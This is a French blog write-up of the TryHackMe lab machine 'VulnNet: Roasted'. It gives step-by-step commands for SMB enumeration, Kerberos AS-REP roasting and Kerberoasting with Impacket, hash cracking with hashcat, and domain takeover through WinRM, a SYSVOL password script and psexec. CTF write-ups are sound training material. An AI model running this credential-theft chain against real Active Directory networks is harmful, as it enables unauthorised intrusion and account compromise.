VulnNet : roasted – Write Up – Fr – TryHackMe

Après VulnNet, Internal, Node, Dotpy, Dotjar, voici le Write Up pour une nouvelle machine « VulnNet » de TryHackMe. Celle-ci s’appelle Roasted, et on verra comment l’exploiter via Kerberos.

Enumération

Bon, c’est un ctf, donc on va commencer avec une commande nmap un peu brutal :

nmap -T5 -p- 10.10.128.107

Elle donne nous le résultat que de la capture qui suit. On peut voir que les ports SMB, DNS, Kerberos sont ouverts. Ça a tout l’air d’être une machine sous Windows, avec possiblement un domaine

Enumération SMB

On va commencer avec enum4linux qui permet d’effectuer tout une série de test sur  SMB

Commandes : 

enum4linux 10.10.128.107

Il n’y a pas de résultat probant si ce n’est le nom de domaine VULNNET-RST

 

Vérifications si des partages sont existants avec smbclient

Commandes : 

smbclient -L \\10.10.128.107

Tentative d’accès au partage VulnNet Business, toujours avec smbclient

Commandes : 

smbclient  \\\\10.10.128.107\\VulnNet-Business-Anonymous

Récupération des fichiers avec la commande mget * 

On fait la même chose avec l’autre partage VulnNet-Entreprise

Finalement, c’est deux partages sont plus des rabbit hole qu’autre chose. La seule information récupérée est une liste de nom de personne. C’est probablement des utilisateurs, mais ce n’est pas leur vrai login de session. Donc ça ne sert a à pas grand-chose. D’autant plus que dans mon énumération, je n’ai pas utilisé smbmap mais smbclient. J’aurais dû le faire en 1ier, cela m’aurait évité de perdre du temps et de voir la liste des partages avec leurs permissions. 

Énumération des utilisateurs.

Avec les outils livrés avec Impacket, il est possible d’énumérer les utilisateurs avec lookupsid sur le partage IPC$ 

Commandes : 

python lookupsid.py anonymous@10.10.128.107 

Il faut récupérer tous les noms d’utilisateurs qui apparaissent et les mettre dans un fichier pour ensuite essayer de récupérer le hash de leur mot de passe avec GetNPUsers.py

Liste des utilisateurs : 

enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet

Domaine : 

VULNNET-RST\

Commandes : 

python GetNPUsers.py ‘VULNNET-RST/’ -usersfile user.txt -no-pass -dc-ip 10.10.128.107

On récupère le hash de l’utilisateur t-skid. On va ensuite cracker son mot de passe avec hashcat 

Cassage du hash

Avec hashcat et powershell

Commandes : 

.\hashcat64.exe -m 18200 hash2.txt rockyou.txt

 

Avec les identifiants obtenus, on va essayer de voir si on peut récupérer d’autres identifiants. 

Commandes : 

python GetUserSPNs.py ‘VULNNET-RST.local/t-skid:redacted‘  -dc-ip 10.10.128.107 -outputfile test.txt

 

On obtient un nouveau hash pour l’utilisateur enterprise-core-vn . On va également le cracker avec hashcat

Commandes : 

.\hashcat64.exe -m 13100 hash2.txt rockyou.txt

Il faut ensuite se connecter au système pour récupérer le fichier user.txt.

User.txt

Avec les identifiants récupérer, on se connecte avec winrm

Commandes : 

ruby evil-winrm.rb -i 10.10.128.107 -u ‘enterprise-core-vn’ -p ‘redacted

Énumération avec l'utilisateur enterprise-core-vn

On recommence l’énumération cette fois-ci directement avec smbmap.

Commandes : 

smbmap -H 10.10.128.107 -u ‘enterprise-core-vn’ -p ‘redacted’

Le partage sysvol est accessible en lecture. On va se connecter dessus avec smbclient et voir si on peut récupérer des informations.

Commandes : 

smbclient //10.10.86.168/SYSVOL –user=enterprise-core-vn

Dans le fichier ResetPasswords, on peut récupérer les identifiants d’un autre utilisateur qui va nous permettre de récupérer le fichier system.txt

Commandes : 

python3 psexec.py a-whitehat:redacted@10.10.202.196

0 0 votes
Évaluation de l'article
S’abonner
Notifier de
0 Commentaires
le plus ancien
le plus récent le plus populaire
Inline Feedbacks
View all comments